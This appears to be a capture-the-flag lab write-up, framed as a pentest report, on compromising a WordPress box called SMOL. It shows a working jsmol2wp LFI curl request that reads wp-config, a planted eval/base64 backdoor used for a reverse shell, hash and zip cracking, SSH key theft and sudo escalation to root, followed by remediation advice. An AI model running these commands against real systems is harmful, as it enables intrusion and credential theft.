JSmol2WP LFI, Hello Dolly backdoor, and multi-user sudo root
Intermediate WordPress engagement: JSmol2WP SSRF/LFI read wp-config and a Hello Dolly backdoor for RCE; MySQL hashes and SSH key pivots through diego/think/gege reached xavi with unrestricted sudo.
- Case files
- JSmol2WP LFI, Hello Dolly backdoor, and multi-user sudo root
Unauthenticated JSmol2WP LFI exposed wp-config and a backdoored Hello Dolly plugin. Credential and key pivots across WordPress users ended with xavi’s full sudo.
php://filter through jsmol.php read wp-config and the backdoored Hello Dolly plugin; admin ?cmd= opened a reverse shell.
diego from MySQL hashes; think via readable id_rsa; gege empty password and zip crack toward xavi.
Old wp-config disclosed xavi credentials. sudo -l showed ALL — root shell without further abuse.
Engagement summary
Unauthenticated JSmol2WP LFI exposed wp-config and a backdoored Hello Dolly plugin. Credential and key pivots across WordPress users ended with xavi’s full sudo.
SMOL (10.10.165.190 / www.smol.thm) ran WordPress 6.7.1 with plugin jsmol2wp ≤ 1.07. CVE-2018-20463-class SSRF accepted php://filter reads of wp-config.php (wpuser database credentials) and of a Hello Dolly plugin containing eval(base64_decode(...)). Logging in as wpuser and hitting /wp-admin/?cmd= produced a www-data shell. MySQL wp_users hashes cracked to diego; diego’s group could read think’s id_rsa for SSH. gege accepted an empty password and held wordpress.old.zip; zip2john recovered a password that unlocked an old wp-config with xavi’s credentials. xavi had (ALL : ALL) ALL in sudoers — root without further exploitation.
Business impact
Abandoned plugins with SSRF/LFI and planted backdoors are RCE. Password reuse across WP, SSH, and zip archives plus empty local passwords collapse multi-user isolation. Unrestricted sudo on any account is root by policy. Remove jsmol2wp, audit plugins for eval backdoors, enforce unique secrets, and never grant ALL sudo to application users.
JSmol2WP LFI and Hello Dolly RCE
php://filter through jsmol.php read wp-config and the backdoored Hello Dolly plugin; admin ?cmd= opened a reverse shell.
OPERATOR · WPSCAN
savvy@lab:~$ echo '10.10.165.190 www.smol.thm' | sudo tee -a /etc/hosts
savvy@lab:~$ wpscan --url http://www.smol.thm --enumerate u,ap
Users: admin, think, wp, gege, diego, xavi
Plugin: jsmol2wp <= 1.07 (SSRF/LFI)
OPERATOR · LFI / RCE
savvy@lab:~$ curl -s 'http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php'
DB_USER wpuser / DB_PASSWORD kblsF2Vop#lw3rjDZ629*Z%G
# same LFI → hello.php backdoor; login as wpuser then /wp-admin/?cmd=
savvy@lab:~$ nc -lvnp 4444
savvy@lab:/var/www/html$
Hash crack and SSH key pivots
diego from MySQL hashes; think via readable id_rsa; gege empty password and zip crack toward xavi.
OPERATOR · LATERAL
savvy@lab:~$ mysql -u wpuser -p -e 'SELECT user_login,user_pass FROM wp_users'
savvy@lab:~$ john hashes.txt --wordlist=rockyou.txt
sandiegocalifornia (diego)
savvy@lab:~$ su diego
savvy@lab:~$ ssh -i /home/think/.ssh/id_rsa think@10.10.165.190
savvy@lab:~$
savvy@lab:~$ su gege
savvy@lab:~$ zip2john wordpress.old.zip > z.hash && john z.hash
hero_gege@hotmail.com (wordpress.old.zip)
xavi unrestricted sudo
Old wp-config disclosed xavi credentials. sudo -l showed ALL — root shell without further abuse.
OPERATOR · ROOT
# old wp-config → xavi / P@ssw0rdxavi@
savvy@lab:~$ su xavi
savvy@lab:~$ sudo -l
(ALL : ALL) ALL
savvy@lab:~$ sudo su
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Remove jsmol2wp and scan plugins for eval backdoors. Rotate all WP and OS passwords after compromise. Fix home-directory ACLs so users cannot read others’ SSH keys. Revoke blanket sudo; use named commands only.